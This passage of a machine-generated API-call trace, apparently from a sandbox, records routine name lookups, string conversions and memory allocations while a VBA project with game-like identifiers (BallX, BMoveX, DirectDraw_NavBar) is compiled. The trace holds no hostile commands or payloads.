IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.244] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_WeaponT", lHashVal=0x10e79c, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.244] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.244] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.244] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_WeaponT", lHashVal=0x10e79c, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.244] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.244] IUnknown:AddRef (This=0x782b300) returned 0x7 [0033.244] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_WeaponT", lHashVal=0x10e79c, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.244] IUnknown:Release (This=0x782b300) returned 0x6 [0033.244] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.244] IUnknown:Release (This=0x782a220) returned 0x1a [0033.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51f92, cbMultiByte=6, lpWideCharStr=0x2e4560, cchWideChar=5 | out: lpWideCharStr="ouch") returned 0 [0033.244] wcscpy_s (in: _Destination=0xb5c86b0, _SizeInWords=0x5, _Source="ouch" | out: _Destination="ouch") returned 0x0 [0033.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51ef2, cbMultiByte=8, lpWideCharStr=0x2e4560, cchWideChar=7 | out: lpWideCharStr="BMoveX") returned 0 [0033.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51ef2, cbMultiByte=8, lpWideCharStr=0x2e4560, cchWideChar=7 | out: lpWideCharStr="BMoveX") returned 0 [0033.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e02, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="BallX") returned 0 [0033.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e2a, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="BallY") returned 0 [0033.245] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x9db0000 [0033.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51f92, cbMultiByte=6, lpWideCharStr=0x2e4560, cchWideChar=5 | out: lpWideCharStr="ouch") returned 0 [0033.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51ef2, cbMultiByte=8, lpWideCharStr=0x2e4560, cchWideChar=7 | out: lpWideCharStr="BMoveX") returned 0 [0033.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51ef2, cbMultiByte=8, lpWideCharStr=0x2e4560, cchWideChar=7 | out: lpWideCharStr="BMoveX") returned 0 [0033.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e2a, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="BallY") returned 0 [0033.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51f92, cbMultiByte=6, lpWideCharStr=0x2e4560, cchWideChar=5 | out: lpWideCharStr="ouch") returned 0 [0033.246] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x9dc0000 [0033.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51f42, cbMultiByte=8, lpWideCharStr=0x2e4560, cchWideChar=7 | out: lpWideCharStr="BMoveY") returned 0 [0033.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51f42, cbMultiByte=8, lpWideCharStr=0x2e4560, cchWideChar=7 | out: lpWideCharStr="BMoveY") returned 0 [0033.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e2a, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="BallY") returned 0 [0033.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51f92, cbMultiByte=6, lpWideCharStr=0x2e4560, cchWideChar=5 | out: lpWideCharStr="ouch") returned 0 [0033.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51f42, cbMultiByte=8, lpWideCharStr=0x2e4560, cchWideChar=7 | out: lpWideCharStr="BMoveY") returned 0 [0033.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51f42, cbMultiByte=8, lpWideCharStr=0x2e4560, cchWideChar=7 | out: lpWideCharStr="BMoveY") returned 0 [0033.247] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x9dd0000 [0033.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e02, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="BallX") returned 0 [0033.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e2a, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="BallY") returned 0 [0033.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51f92, cbMultiByte=6, lpWideCharStr=0x2e4560, cchWideChar=5 | out: lpWideCharStr="ouch") returned 0 [0033.248] IMalloc:Alloc (This=0x7fefe015380, cb=0xb) returned 0xb4963f0 [0033.248] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_MeX") returned 0x10706d [0033.248] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.248] IUnknown:Release (This=0x782a220) returned 0x1a [0033.248] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_MeY") returned 0x10706a [0033.248] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.248] IUnknown:Release (This=0x782a220) returned 0x1a [0033.249] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rBuf") returned 0x100fea [0033.249] strcpy_s (in: _Dst=0x2e46a0, _DstSize=0x5, _Src="rBuf" | out: _Dst="rBuf") returned 0x0 [0033.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46a0, cbMultiByte=5, lpWideCharStr=0x2e44f0, cchWideChar=5 | out: lpWideCharStr="rBuf") returned 5 [0033.249] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.249] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="rBuf", lHashVal=0x100fea, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.249] IUnknown:Release (This=0x782a220) returned 0x1a [0033.249] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.249] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="rBuf", lHashVal=0x100fea, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.249] IUnknown:Release (This=0x731da90) returned 0x15 [0033.249] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.249] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="rBuf", lHashVal=0x100fea, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.249] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.249] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.249] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="rBuf", lHashVal=0x100fea, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.249] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.249] IMalloc:Alloc (This=0x7fefe015380, cb=0xc) returned 0xb4963f0 [0033.249] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_rBuf") returned 0x107556 [0033.249] strcpy_s (in: _Dst=0x2e4850, _DstSize=0xc, _Src="_B_var_rBuf" | out: _Dst="_B_var_rBuf") returned 0x0 [0033.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4850, cbMultiByte=12, lpWideCharStr=0x2e46a0, cchWideChar=12 | out: lpWideCharStr="_B_var_rBuf") returned 12 [0033.249] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.249] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_rBuf", lHashVal=0x107556, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.249] IUnknown:Release (This=0x782a220) returned 0x1a [0033.249] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.249] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_rBuf", lHashVal=0x107556, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.249] IUnknown:Release (This=0x731da90) returned 0x15 [0033.249] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.249] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_rBuf", lHashVal=0x107556, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.249] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.249] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.249] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_rBuf", lHashVal=0x107556, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.249] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.249] IUnknown:AddRef (This=0x782b300) returned 0x7 [0033.249] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_rBuf", lHashVal=0x107556, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.249] IUnknown:Release (This=0x782b300) returned 0x6 [0033.249] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.249] IUnknown:Release (This=0x782a220) returned 0x1a [0033.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6820caa, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="F") returned 0 [0033.249] wcscpy_s (in: _Destination=0xb5c86c8, _SizeInWords=0x2, _Source="F" | out: _Destination="F") returned 0x0 [0033.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5093e, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="Top") returned 0 [0033.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6820caa, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="F") returned 0 [0033.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5093e, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="Top") returned 0 [0033.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6820caa, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="F") returned 0 [0033.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5098e, cbMultiByte=8, lpWideCharStr=0x2e4560, cchWideChar=7 | out: lpWideCharStr="Bottom") returned 0 [0033.249] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x9de0000 [0033.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5202a, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="Color") returned 0 [0033.250] wcscpy_s (in: _Destination=0xb5c86d8, _SizeInWords=0x6, _Source="Color" | out: _Destination="Color") returned 0x0 [0033.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6820caa, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="F") returned 0 [0033.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68210ee, cbMultiByte=6, lpWideCharStr=0x2e4560, cchWideChar=5 | out: lpWideCharStr="Left") returned 0 [0033.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6820caa, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="F") returned 0 [0033.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68210ee, cbMultiByte=6, lpWideCharStr=0x2e4560, cchWideChar=5 | out: lpWideCharStr="Left") returned 0 [0033.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6820caa, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="F") returned 0 [0033.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822f6a, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="Right") returned 0 [0033.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6820caa, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="F") returned 0 [0033.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68210ee, cbMultiByte=6, lpWideCharStr=0x2e4560, cchWideChar=5 | out: lpWideCharStr="Left") returned 0 [0033.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6820caa, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="F") returned 0 [0033.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68210ee, cbMultiByte=6, lpWideCharStr=0x2e4560, cchWideChar=5 | out: lpWideCharStr="Left") returned 0 [0033.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6820caa, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="F") returned 0 [0033.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5093e, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="Top") returned 0 [0033.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6820caa, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="F") returned 0 [0033.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5093e, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="Top") returned 0 [0033.251] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x9df0000 [0033.252] IMalloc:Alloc (This=0x7fefe015380, cb=0xc) returned 0xb4963f0 [0033.252] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ResX") returned 0x108529 [0033.252] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.252] IUnknown:Release (This=0x782a220) returned 0x1a [0033.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6820caa, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="F") returned 0 [0033.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822f6a, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="Right") returned 0 [0033.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6820caa, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="F") returned 0 [0033.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822f6a, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="Right") returned 0 [0033.252] IMalloc:Alloc (This=0x7fefe015380, cb=0xc) returned 0xb4963f0 [0033.252] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ResY") returned 0x108526 [0033.252] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.252] IUnknown:Release (This=0x782a220) returned 0x1a [0033.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6820caa, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="F") returned 0 [0033.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5098e, cbMultiByte=8, lpWideCharStr=0x2e4560, cchWideChar=7 | out: lpWideCharStr="Bottom") returned 0 [0033.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6820caa, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="F") returned 0 [0033.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5098e, cbMultiByte=8, lpWideCharStr=0x2e4560, cchWideChar=7 | out: lpWideCharStr="Bottom") returned 0 [0033.252] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DirectDraw_NavBar") returned 0x10f8bf [0033.252] strcpy_s (in: _Dst=0x2e46a0, _DstSize=0x12, _Src="DirectDraw_NavBar" | out: _Dst="DirectDraw_NavBar") returned 0x0 [0033.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46a0, cbMultiByte=18, lpWideCharStr=0x2e44f0, cchWideChar=18 | out: lpWideCharStr="DirectDraw_NavBar") returned 18 [0033.252] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.252] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="DirectDraw_NavBar", lHashVal=0x10f8bf, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.252] IUnknown:Release (This=0x782a220) returned 0x1a [0033.252] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.252] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="DirectDraw_NavBar", lHashVal=0x10f8bf, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.252] IUnknown:Release (This=0x731da90) returned 0x15 [0033.252] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.252] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="DirectDraw_NavBar", lHashVal=0x10f8bf, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.252] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.252] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.252] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="DirectDraw_NavBar", lHashVal=0x10f8bf, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.252] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.253] IMalloc:Alloc (This=0x7fefe015380, cb=0x19) returned 0x7668550 [0033.253] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_DirectDraw_NavBar") returned 0x10330c [0033.253] strcpy_s (in: _Dst=0x2e4850, _DstSize=0x19, _Src="_B_var_DirectDraw_NavBar" | out: _Dst="_B_var_DirectDraw_NavBar") returned 0x0 [0033.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4850, cbMultiByte=25, lpWideCharStr=0x2e46a0, cchWideChar=25 | out: lpWideCharStr="_B_var_DirectDraw_NavBar") returned 25 [0033.253] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.253] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_DirectDraw_NavBar", lHashVal=0x10330c, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.253] IUnknown:Release (This=0x782a220) returned 0x1a [0033.253] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.253] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_DirectDraw_NavBar", lHashVal=0x10330c, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.253] IUnknown:Release (This=0x731da90) returned 0x15 [0033.253] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.253] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_DirectDraw_NavBar", lHashVal=0x10330c, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.253] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.253] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.253] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_DirectDraw_NavBar", lHashVal=0x10330c, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.253] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.253] IUnknown:AddRef (This=0x782b300) returned 0x7 [0033.253] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_DirectDraw_NavBar", lHashVal=0x10330c, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.253] IUnknown:Release (This=0x782b300) returned 0x6 [0033.253] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.253] IUnknown:Release (This=0x782a220) returned 0x1a [0033.253] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_DDBLTFAST_WAIT") returned 0x1027f3 [0033.253] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.253] IUnknown:Release (This=0x782a220) returned 0x1a [0033.253] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DDBLTFAST_SRCCOLORKEY") returned 0x100057 [0033.253] strcpy_s (in: _Dst=0x2e46a0, _DstSize=0x16, _Src="DDBLTFAST_SRCCOLORKEY" | out: _Dst="DDBLTFAST_SRCCOLORKEY") returned 0x0 [0033.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46a0, cbMultiByte=22, lpWideCharStr=0x2e44f0, cchWideChar=22 | out: lpWideCharStr="DDBLTFAST_SRCCOLORKEY") returned 22 [0033.253] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.253] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="DDBLTFAST_SRCCOLORKEY", lHashVal=0x100057, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.253] IUnknown:Release (This=0x782a220) returned 0x1a [0033.253] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.253] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="DDBLTFAST_SRCCOLORKEY", lHashVal=0x100057, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.253] IUnknown:Release (This=0x731da90) returned 0x15 [0033.253] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.253] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="DDBLTFAST_SRCCOLORKEY", lHashVal=0x100057, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.253] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.253] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.253] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="DDBLTFAST_SRCCOLORKEY", lHashVal=0x100057, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.253] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.253] IMalloc:Alloc (This=0x7fefe015380, cb=0x1d) returned 0x7668550 [0033.254] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_DDBLTFAST_SRCCOLORKEY") returned 0x108f81 [0033.254] strcpy_s (in: _Dst=0x2e4850, _DstSize=0x1d, _Src="_B_var_DDBLTFAST_SRCCOLORKEY" | out: _Dst="_B_var_DDBLTFAST_SRCCOLORKEY") returned 0x0 [0033.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4850, cbMultiByte=29, lpWideCharStr=0x2e46a0, 